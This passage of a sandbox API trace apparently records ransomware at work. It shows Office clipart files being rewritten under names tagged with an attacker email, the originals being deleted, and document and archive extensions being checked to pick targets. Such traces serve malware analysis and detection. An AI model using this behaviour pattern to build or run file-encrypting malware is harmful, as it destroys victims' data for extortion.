lpOverlapped=0x0) returned 1 [0053.681] WriteFile (in: hFile=0x1b4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x730, lpOverlapped=0x0) returned 1 [0053.682] ReadFile (in: hFile=0x228, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.682] WriteFile (in: hFile=0x1b4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.682] SetEndOfFile (hFile=0x1b4) returned 1 [0053.682] CloseHandle (hObject=0x1b4) returned 1 [0053.682] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.682] SetEndOfFile (hFile=0x228) returned 1 [0053.683] CloseHandle (hObject=0x228) returned 1 [0053.683] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.683] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf")) returned 1 [0053.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0053.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0053.683] lstrlenW (lpString=".doc") returned 4 [0053.683] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.683] lstrlenW (lpString=".docx") returned 5 [0053.683] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.683] lstrlenW (lpString=".pdf") returned 4 [0053.684] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.684] lstrlenW (lpString=".xls") returned 4 [0053.684] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.684] lstrlenW (lpString=".xlsx") returned 5 [0053.684] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.684] lstrlenW (lpString=".ppt") returned 4 [0053.684] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.684] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0053.684] lstrlenW (lpString=".zip") returned 4 [0053.684] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.684] lstrlenW (lpString=".rar") returned 4 [0053.684] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.684] lstrlenW (lpString=".bz2") returned 4 [0053.684] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.684] lstrlenW (lpString=".7z") returned 3 [0053.684] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.684] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0053.684] lstrlenW (lpString=".dbf") returned 4 [0053.684] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.684] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0053.684] lstrlenW (lpString=".1cd") returned 4 [0053.684] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.684] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0053.684] lstrlenW (lpString=".jpg") returned 4 [0053.684] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.685] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=26332) returned 1 [0053.685] CloseHandle (hObject=0x228) returned 1 [0053.685] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf")) returned 0x20 [0053.685] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.685] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0053.685] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.685] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.685] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.686] GetLastError () returned 0x0 [0053.686] ReadFile (in: hFile=0x228, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x66dc, lpOverlapped=0x0) returned 1 [0053.687] WriteFile (in: hFile=0x1b4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x66e0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x66e0, lpOverlapped=0x0) returned 1 [0053.689] ReadFile (in: hFile=0x228, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.689] WriteFile (in: hFile=0x1b4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.689] SetEndOfFile (hFile=0x1b4) returned 1 [0053.689] CloseHandle (hObject=0x1b4) returned 1 [0053.689] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.689] SetEndOfFile (hFile=0x228) returned 1 [0053.690] CloseHandle (hObject=0x228) returned 1 [0053.690] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.690] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01173_.wmf")) returned 1 [0053.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0053.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0053.690] lstrlenW (lpString=".doc") returned 4 [0053.690] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.690] lstrlenW (lpString=".docx") returned 5 [0053.690] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.690] lstrlenW (lpString=".pdf") returned 4 [0053.691] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.691] lstrlenW (lpString=".xls") returned 4 [0053.691] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.691] lstrlenW (lpString=".xlsx") returned 5 [0053.691] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.691] lstrlenW (lpString=".ppt") returned 4 [0053.691] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0053.691] lstrlenW (lpString=".zip") returned 4 [0053.691] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.691] lstrlenW (lpString=".rar") returned 4 [0053.691] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.691] lstrlenW (lpString=".bz2") returned 4 [0053.691] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.691] lstrlenW (lpString=".7z") returned 3 [0053.691] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0053.691] lstrlenW (lpString=".dbf") returned 4 [0053.691] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0053.691] lstrlenW (lpString=".1cd") returned 4 [0053.691] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.691] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01173_.WMF") returned 63 [0053.691] lstrlenW (lpString=".jpg") returned 4 [0053.691] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.691] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.692] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.692] GetLastError () returned 0x0 [0053.692] ReadFile (in: hFile=0x228, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x6cd2, lpOverlapped=0x0) returned 1 [0053.696] WriteFile (in: hFile=0x1b4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x6ce0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x6ce0, lpOverlapped=0x0) returned 1 [0053.697] ReadFile (in: hFile=0x228, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.698] WriteFile (in: hFile=0x1b4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.698] SetEndOfFile (hFile=0x1b4) returned 1 [0053.698] CloseHandle (hObject=0x1b4) returned 1 [0053.698] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.698] SetEndOfFile (hFile=0x228) returned 1 [0053.699] CloseHandle (hObject=0x228) returned 1 [0053.699] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.699] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf")) returned 1 [0053.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0053.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0053.699] lstrlenW (lpString=".doc") returned 4 [0053.699] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.699] lstrlenW (lpString=".docx") returned 5 [0053.699] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.699] lstrlenW (lpString=".pdf") returned 4 [0053.699] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.700] lstrlenW (lpString=".xls") returned 4 [0053.700] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.700] lstrlenW (lpString=".xlsx") returned 5 [0053.700] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.700] lstrlenW (lpString=".ppt") returned 4 [0053.700] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0053.700] lstrlenW (lpString=".zip") returned 4 [0053.700] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.700] lstrlenW (lpString=".rar") returned 4 [0053.700] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.700] lstrlenW (lpString=".bz2") returned 4 [0053.700] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.700] lstrlenW (lpString=".7z") returned 3 [0053.700] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0053.700] lstrlenW (lpString=".dbf") returned 4 [0053.700] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0053.700] lstrlenW (lpString=".1cd") returned 4 [0053.700] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 63 [0053.700] lstrlenW (lpString=".jpg") returned 4 [0053.700] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.700] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.700] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.701] GetLastError () returned 0x0 [0053.701] ReadFile (in: hFile=0x228, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0xea2, lpOverlapped=0x0) returned 1 [0053.888] WriteFile (in: hFile=0x1b4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xeb0, lpOverlapped=0x0) returned 1 [0053.889] ReadFile (in: hFile=0x228, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.889] WriteFile (in: hFile=0x1b4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.889] SetEndOfFile (hFile=0x1b4) returned 1 [0054.090] CloseHandle (hObject=0x1b4) returned 1 [0054.090] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.090] SetEndOfFile (hFile=0x228) returned 1 [0054.109] CloseHandle (hObject=0x228) returned 1 [0054.109] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.110] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf")) returned 1 [0054.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0054.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0054.116] lstrlenW (lpString=".doc") returned 4 [0054.116] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.116] lstrlenW (lpString=".docx") returned 5 [0054.116] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.116] lstrlenW (lpString=".pdf") returned 4 [0054.116] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.116] lstrlenW (lpString=".xls") returned 4 [0054.116] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.116] lstrlenW (lpString=".xlsx") returned 5 [0054.116] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.116] lstrlenW (lpString=".ppt") returned 4 [0054.116] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0054.116] lstrlenW (lpString=".zip") returned 4 [0054.116] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.116] lstrlenW (lpString=".rar") returned 4 [0054.116] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.116] lstrlenW (lpString=".bz2") returned 4 [0054.116] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.116] lstrlenW (lpString=".7z") returned 3 [0054.116] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0054.116] lstrlenW (lpString=".dbf") returned 4 [0054.116] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0054.116] lstrlenW (lpString=".1cd") returned 4 [0054.116] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.116] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0054.116] lstrlenW (lpString=".jpg") returned 4 [0054.116] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.121] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.121] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0054.142] GetLastError () returned 0x0 [0054.142] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x2418, lpOverlapped=0x0) returned 1 [0054.160] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x2420, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x2420, lpOverlapped=0x0) returned 1 [0054.161] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.161] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.162] SetEndOfFile (hFile=0x160) returned 1 [0054.162] CloseHandle (hObject=0x160) returned 1 [0054.162] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.162] SetEndOfFile (hFile=0x1f0) returned 1 [0054.163] CloseHandle (hObject=0x1f0) returned 1 [0054.163] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0054.163] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an03500_.wmf")) returned 1 [0054.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0054.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0054.163] lstrlenW (lpString=".doc") returned 4 [0054.163] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.164] lstrlenW (lpString=".docx") returned 5 [0054.164] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.164] lstrlenW (lpString=".pdf") returned 4 [0054.164] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.164] lstrlenW (lpString=".xls") returned 4 [0054.164] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.164] lstrlenW (lpString=".xlsx") returned 5 [0054.164] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.164] lstrlenW (lpString=".ppt") returned 4 [0054.164] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0054.164] lstrlenW (lpString=".zip") returned 4 [0054.164] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.164] lstrlenW (lpString=".rar") returned 4 [0054.164] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.164] lstrlenW (lpString=".bz2") returned 4 [0054.164] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.164] lstrlenW (lpString=".7z") returned 3 [0054.164] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0054.164] lstrlenW (lpString=".dbf") returned 4 [0054.164] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0054.164] lstrlenW (lpString=".1cd") returned 4 [0054.164] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.164] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN03500_.WMF") returned 63 [0054.164] lstrlenW (lpString=".jpg") returned 4 [0054.164] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.165] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.165] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0054.165] GetLastError () returned 0x0 [0054.165] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0xc48, lpOverlapped=0x0) returned 1 [0054.167] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xc50, lpOverlapped=0x0) returned 1 [0054.167] ReadFile (in: hFile=0x1f0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0054.168] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.168] SetEndOfFile (hFile=0x160) returned 1 [0054.168] CloseHandle (hObject=0x160) returned 1 [0054.168] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0054.168] SetEndOfFile (hFile=0x1f0) returned 1 [0054.168] CloseHandle (hObject=0x1f0) returned 1 [0054.169] SetFileAttributesW 